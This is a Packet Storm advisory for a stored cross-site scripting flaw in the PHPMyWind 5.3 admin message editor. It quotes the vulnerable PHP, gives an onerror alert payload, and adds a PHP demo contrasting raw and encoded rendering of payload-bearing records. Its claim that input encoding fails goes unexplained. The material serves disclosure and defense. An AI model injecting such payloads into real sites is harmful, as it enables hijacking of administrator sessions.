PACKETSTORM:143855
Aug 21, 2017
PHPMyWind 5.3 Cross Site Scripting

Packet Storm, packetstormsecurity.com

EPSS: 0.001 (Low), percentile 45.9%

`Exploit Title: PHPMyWind 5.3 has XSS
Exploit Author: adege
Vendor Homepage: http://phpmywind.com
Software Link: http://phpmywind.com/downloads/PHPMyWind_5.3.zip
Version: 5.3
CVE: CVE-2017-12984
  
  
// Front-end submission handler. The three user-supplied fields are passed
// through htmlspecialchars() with its default flags (which encode & < > and
// the double quote, but not the single quote) and then interpolated into the INSERT.
$r = $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");
$orderid = (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));
$nickname = htmlspecialchars($nickname); // nickname
$contact = htmlspecialchars($contact);   // contact details
$content = htmlspecialchars($content);   // message content

$posttime = GetMkTime(time());
$ip = gethostbyname($_SERVER['REMOTE_ADDR']);


$sql = "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";
if($dosql->ExecNoneQuery($sql))
{
    ShowMsg('Message submitted, please wait for administrator review!', 'message.php');
    exit();
}
}

The submission handler above passes nickname, contact and content through htmlspecialchars before the INSERT, but that does not stop the attack. Now look at where content is output, in admin/message_update.php (http://127.0.0.1/PHPMyWind_5.3/admin/message_update.php on the test install):
<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Edit message</title>
<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="templates/js/jquery.min.js"></script>
<script type="text/javascript" src="templates/js/checkf.func.js"></script>
<script type="text/javascript" src="editor/kindeditor-min.js"></script>
<script type="text/javascript" src="editor/lang/zh_CN.js"></script>
</head>
<body>
<?php
$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");
?>
<div class="formHeader"> <span class="title">Edit message</span> <a href="javascript:location.reload();" class="reload">Refresh</a> </div>
<form name="form" id="form" method="post" action="message_save.php">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">
<tr>
<td width="25%" height="40" align="right">Username:</td>
<td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>
</tr>
<tr>
<td height="40" align="right">Contact:</td>
<td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>
</tr>
<tr>
<td height="198" align="right">Message content:</td>
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
<script>

p:33
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>

You can see that content is echoed straight back into the page with no output encoding at all; nickname (element content) and contact (a double-quoted attribute value) are echoed the same way. Note the output context: inside a textarea, markup is RCDATA and stays inert unless the stored value also contains </textarea> or the page's own scripts later render the value as HTML; the <script> block that follows the textarea is cut off in the listing above.

EXP: a><img/src=x onerror=alert(2001)><aa
  
`
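As an added example (this is not code from the advisory or from PHPMyWind), the following PHP reproduces the three raw echoes from admin/message_update.php beside the same markup rendered with output encoding applied at the point of use. The function names h(), render_vulnerable(), render_hardened() and contains_injected_tag() are my own, and $row is a constructed sample record carrying the advisory's payload adapted to each output context. It goes slightly beyond the advisory by covering the element-content and attribute-value cases as well as the textarea.

```php
<?php
// Added example, not PHPMyWind code. It mirrors the three raw echoes in
// admin/message_update.php and shows the same page rendered with output
// encoding at the point of use. $row is a constructed sample record, not
// data taken from the application.
declare(strict_types=1);

// Encode for HTML element content and double-quoted attribute values.
// ENT_QUOTES also covers the single quote, which PHP's default ENT_COMPAT
// leaves untouched; ENT_SUBSTITUTE avoids an empty result on invalid UTF-8.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering, mirroring message_update.php: stored values are
// echoed raw into element content, an attribute value and a textarea.
function render_vulnerable(array $row): string
{
    return '<strong>' . $row['nickname'] . '</strong>' . "\n"
         . '<input type="text" name="contact" value="' . $row['contact'] . '" />' . "\n"
         . '<textarea name="content">' . $row['content'] . '</textarea>' . "\n";
}

// Hardened rendering: identical markup, every interpolation passed through h().
// Encoding on output also protects records that reached the table unencoded,
// whatever happened (or did not happen) on the input side.
function render_hardened(array $row): string
{
    return '<strong>' . h($row['nickname']) . '</strong>' . "\n"
         . '<input type="text" name="contact" value="' . h($row['contact']) . '" />' . "\n"
         . '<textarea name="content">' . h($row['content']) . '</textarea>' . "\n";
}

// Crude check used only for this demo: the markup we write ourselves contains
// no <img>, so any <img> in the rendered page came from the stored values.
function contains_injected_tag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

// Constructed sample record. Each field carries the advisory's payload shaped
// for its output context: element content needs only '<'; the attribute needs
// a closing '"'; the textarea (RCDATA) needs '</textarea>' to break out.
$row = [
    'nickname' => 'a><img/src=x onerror=alert(2001)><aa',
    'contact'  => '"><img/src=x onerror=alert(2001)>',
    'content'  => '</textarea><img/src=x onerror=alert(2001)>',
];

echo "--- vulnerable ---\n", render_vulnerable($row);
echo "injected tag present: ", var_export(contains_injected_tag(render_vulnerable($row)), true), "\n";
echo "--- hardened ---\n", render_hardened($row);
echo "injected tag present: ", var_export(contains_injected_tag(render_hardened($row)), true), "\n";
```

Run it with `php` on the command line: the vulnerable rendering reports the injected tag present in all three contexts, the hardened one reports it absent. Encoding at output is the fix regardless of what the input side did, and using ENT_QUOTES closes the single-quote gap that the default flags used by the submission handler leave open.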
